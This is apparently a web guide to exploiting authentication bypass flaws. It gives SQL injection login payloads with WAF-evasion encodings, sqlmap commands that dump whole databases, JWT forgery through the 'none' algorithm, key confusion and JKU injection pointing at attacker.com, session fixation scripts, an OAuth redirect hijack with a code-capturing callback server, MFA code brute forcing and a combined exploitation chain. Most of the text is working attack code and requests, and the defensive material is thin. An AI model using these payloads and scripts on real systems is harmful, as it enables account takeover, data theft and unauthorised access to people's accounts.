Skip to content

Authentication Bypass Exploitation

This guide provides detailed exploitation techniques for authentication bypass vulnerabilities, including real-world examples, code snippets, and step-by-step methodologies.

1. SQL Injection Authentication Bypass

Technique Overview

SQL injection in authentication forms allows attackers to manipulate SQL queries to bypass login checks.

Real-World Case: Government Portal Breach (2021)

A national government portal used vulnerable authentication code that allowed SQL injection. Attackers gained access to citizen data by bypassing authentication.

Exploitation Steps

Step 1: Identify Vulnerable Login Form 

POST /login HTTP/1.1
Host: vulnerable-gov-portal.gov
Content-Type: application/x-www-form-urlencoded

username=test&password=test

Step 2: Test for SQL Injection 

username: admin'--
password: anything

-- Equivalent SQL: SELECT * FROM users WHERE username = 'admin'--' AND password = 'anything'

Step 3: Advanced Bypass Payloads 

-- Classic bypass
username: admin' OR '1'='1'--
password: anything

-- Union-based injection
username: admin' UNION SELECT 1,'admin','hashed_password',1--
password: anything

-- Boolean-based blind
username: admin' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--
password: anything

Step 4: Automated Exploitation with SQLmap 

# Test for injection
sqlmap -u "http://vulnerable-gov-portal.gov/login" --data="username=test&password=test" --level=5 --risk=3

# Dump database
sqlmap -u "http://vulnerable-gov-portal.gov/login" --data="username=test&password=test" --dump-all

# Specific table dump
sqlmap -u "http://vulnerable-gov-portal.gov/login" --data="username=test&password=test" -D app_db -T users --dump

Defense Bypass Techniques

WAF Bypass Payloads 

-- URL encoding
username: admin%27%20OR%20%271%27%3D%271%27--

-- Double URL encoding
username: admin%2527%2520OR%2520%25271%2527%253D%25271%2527--

-- Unicode encoding
username: admin%C0%A7OR%C0%A71%C0%A7=C0%A71--

-- Comment variations
username: admin'/**/OR/**/'1'='1'--

2. JWT Token Manipulation Exploitation

Technique Overview

JSON Web Token manipulation allows attackers to modify token claims to escalate privileges or bypass authentication.

Real-World Case: Financial App Compromise (2022)

A fintech application failed to validate JWT signatures, allowing attackers to modify user roles from "user" to "admin".

Exploitation Steps

Step 1: Capture Valid JWT Token 

GET /api/user/profile HTTP/1.1
Host: fintech-app.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0IiwidXNlcm5hbWUiOiJqb2huIiwicm9sZSI6InVzZXIiLCJpYXQiOjE2MzAwMDAwMDB9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Step 2: Decode and Analyze Token 

import jwt

token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0IiwidXNlcm5hbWUiOiJqb2huIiwicm9sZSI6InVzZXIiLCJpYXQiOjE2MzAwMDAwMDB9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"

# Decode without verification
decoded = jwt.decode(token, options={"verify_signature": False})
print(decoded)
# Output: {'sub': '1234', 'username': 'john', 'role': 'user', 'iat': 1630000000}

Step 3: Modify Token Claims 

# Change role to admin
decoded['role'] = 'admin'

# Create new token with 'none' algorithm
new_token = jwt.encode(decoded, key='', algorithm='none')
print(new_token)

Step 4: Use Modified Token 

GET /api/admin/dashboard HTTP/1.1
Host: fintech-app.com
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0IiwidXNlcm5hbWUiOiJqb2huIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjMwMDAwMDAwfQ.

Advanced JWT Attacks

Key Confusion Attack 

# If server accepts RS256 but we have HS256 key
public_key = open('public.pem', 'r').read()
token = jwt.encode(decoded, key=public_key, algorithm='HS256')

JKU Header Injection 

# Modify token to use attacker-controlled JWK set
decoded_header = {
    "alg": "RS256",
    "typ": "JWT",
    "jku": "https://attacker.com/jwks.json"
}

3. Session Fixation Exploitation

Technique Overview

Session fixation allows attackers to hijack user sessions by forcing victims to use attacker-controlled session IDs.

Real-World Case: E-commerce Session Hijacking (2020)

A major e-commerce platform was vulnerable to session fixation, leading to unauthorized purchases.

Exploitation Steps

Step 1: Obtain Fixated Session 

import requests

# Attacker visits site and gets session
session = requests.Session()
response = session.get('https://vulnerable-store.com')
fixated_session_id = session.cookies.get('sessionid')
print(f"Fixated Session ID: {fixated_session_id}")

Step 2: Lure Victim to Use Session 

<!-- Malicious page that sets the session cookie -->
<script>
document.cookie = "sessionid=fixated_session_id; domain=.vulnerable-store.com; path=/";
window.location = "https://vulnerable-store.com/login";
</script>

Step 3: Wait for Victim Authentication 

# Attacker monitors the session
while True:
    response = requests.get('https://vulnerable-store.com/profile', 
                          cookies={'sessionid': fixated_session_id})
    if "Welcome" in response.text:
        print("Victim has authenticated!")
        break
    time.sleep(5)

Step 4: Hijack Session 

# Access victim's account
response = requests.get('https://vulnerable-store.com/checkout', 
                       cookies={'sessionid': fixated_session_id})
print("Accessing victim's checkout:", response.status_code)

4. OAuth Bypass Exploitation

Technique Overview

OAuth implementation flaws can allow attackers to bypass authentication or obtain unauthorized access tokens.

Real-World Case: Cloud Service Compromise (2021)

A cloud provider had OAuth redirect_uri validation flaws, allowing token theft.

Exploitation Steps

Step 1: Identify OAuth Endpoints 

GET /.well-known/oauth-authorization-server
GET /.well-known/openid-configuration

Step 2: Manipulate Redirect URI 

GET /oauth/authorize?
  response_type=code&
  client_id=12345&
  redirect_uri=https://attacker.com/callback&
  scope=openid%20profile%20email

Step 3: Code Interception 

# Attacker's callback server
from flask import Flask, request
app = Flask(__name__)

@app.route('/callback')
def callback():
    code = request.args.get('code')
    print(f"Captured authorization code: {code}")
    return "Thank you for authenticating!"

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

Step 4: Exchange Code for Token 

POST /oauth/token HTTP/1.1
Host: oauth-provider.com
Content-Type: application/x-www-form-urlencoded

grant_type=authorization_code&
code=STOLEN_CODE&
redirect_uri=https://attacker.com/callback&
client_id=12345&
client_secret=CLIENT_SECRET

5. MFA Bypass Techniques

Technique Overview

Multi-Factor Authentication can be bypassed through various techniques including session manipulation and code reuse.

Real-World Case: Banking App MFA Bypass (2022)

A banking application allowed MFA bypass by reusing valid codes or skipping MFA verification.

Exploitation Methods

Session State Manipulation 

# Bypass MFA by directly accessing post-MFA endpoints
GET /dashboard HTTP/1.1
Host: bank-app.com
Cookie: session=valid_session_id
X-Forwarded-For: 127.0.0.1

# Manipulate MFA verification state
POST /verify-mfa HTTP/1.1
Host: bank-app.com
Cookie: session=valid_session_id
Content-Type: application/json

{"verified": true, "mfa_code": "123456"}

Time-Based Code Reuse 

# Brute force MFA codes (6-digit)
import requests
import itertools

session = requests.Session()
# ... obtain session through login

for code in itertools.product('0123456789', repeat=6):
    mfa_code = ''.join(code)
    response = session.post('/verify-mfa', json={'code': mfa_code})
    if response.status_code == 200:
        print(f"Valid MFA code: {mfa_code}")
        break

MFA Bypass via API Endpoints 

# Some apps have separate API endpoints that don't enforce MFA
GET /api/v1/user/profile HTTP/1.1
Host: app.com
Authorization: Bearer valid_token

# Versus the web interface that requires MFA
GET /web/profile HTTP/1.1
Host: app.com
Cookie: session=valid_session_id

6. Automated Exploitation Tools

SQLmap for Authentication Bypass

# Basic authentication bypass test
sqlmap -u "http://target.com/login" --data="username=admin&password=test" \
  --level=5 --risk=3 --technique=B --batch

# Specific parameter targeting
sqlmap -u "http://target.com/login" --data="username=admin&password=test" \
  -p username --prefix="'" --suffix="--"

# Time-based blind injection
sqlmap -u "http://target.com/login" --data="username=admin&password=test" \
  --technique=T --time-sec=10

JWT Tool Suite

# JWT cracking
jwt-tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0In0.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

# JWT scan for vulnerabilities
jwt-scan https://target.com/api/user --cookie "token=eyJhbGciOi..."

# JWT forge for token manipulation
python3 jwt_forge.py -t eyJhbGciOi... -k public.pem -a HS256

Custom Exploitation Scripts

#!/usr/bin/env python3
import requests
import sys

def test_sql_injection(url, payloads):
    for payload in payloads:
        data = {'username': payload, 'password': 'test'}
        response = requests.post(url, data=data)
        if "Welcome" in response.text or "Dashboard" in response.text:
            print(f"SUCCESS with payload: {payload}")
            return True
    return False

# Common SQL injection payloads
payloads = [
    "admin'--",
    "admin'/*",
    "admin'#",
    "admin' OR '1'='1'--",
    "admin' UNION SELECT 1,2,3--"
]

if __name__ == "__main__":
    url = sys.argv[1]
    test_sql_injection(url, payloads)

7. Defense Evasion Techniques

WAF Bypass Methods

-- Case variation
Admin' OR '1'='1'--

-- White space alternatives
admin'/**/OR/**/'1'='1'--

-- URL encoding
admin%27%20OR%20%271%27%3D%271%27--

-- Double URL encoding
admin%2527%2520OR%2520%25271%2527%253D%25271%2527--

-- Unicode encoding
admin%C0%A7OR%C0%A71%C0%A7=C0%A71--

Session Fixation Prevention Bypass

// Clear existing sessions before setting new one
document.cookie = "sessionid=; expires=Thu, 01 Jan 1970 00:00:00 GMT; domain=.target.com; path=/";
document.cookie = "sessionid=attacker_session; domain=.target.com; path=/";

OAuth Security Bypass

# Open redirect through parameter pollution
GET /oauth/authorize?redirect_uri=https://target.com/callback&redirect_uri=https://attacker.com

# Host header injection
GET /oauth/authorize?client_id=123&redirect_uri=https://target.com/callback
Host: attacker.com

8. Real-World Exploitation Framework

Comprehensive Testing Methodology

  1. Reconnaissance: Identify authentication endpoints and technologies
  2. Testing: Apply various bypass techniques systematically
  3. Validation: Verify successful bypass and access level
  4. Documentation: Record findings and evidence
  5. Reporting: Provide detailed exploitation proof

Example Exploitation Chain

def full_exploitation_chain(target_url):
    # Step 1: Test SQL injection
    if test_sql_injection(target_url + '/login'):
        print("SQL injection vulnerability found!")

    # Step 2: Test session fixation
    session_id = test_session_fixation(target_url)
    if session_id:
        print(f"Session fixation possible: {session_id}")

    # Step 3: Test JWT vulnerabilities
    jwt_token = extract_jwt_token(target_url)
    if test_jwt_manipulation(jwt_token):
        print("JWT manipulation successful!")

    # Step 4: Test OAuth flaws
    if test_oauth_bypass(target_url):
        print("OAuth bypass possible!")

This comprehensive exploitation guide provides security professionals with the tools and techniques needed to identify and exploit authentication bypass vulnerabilities effectively while understanding the corresponding defensive measures.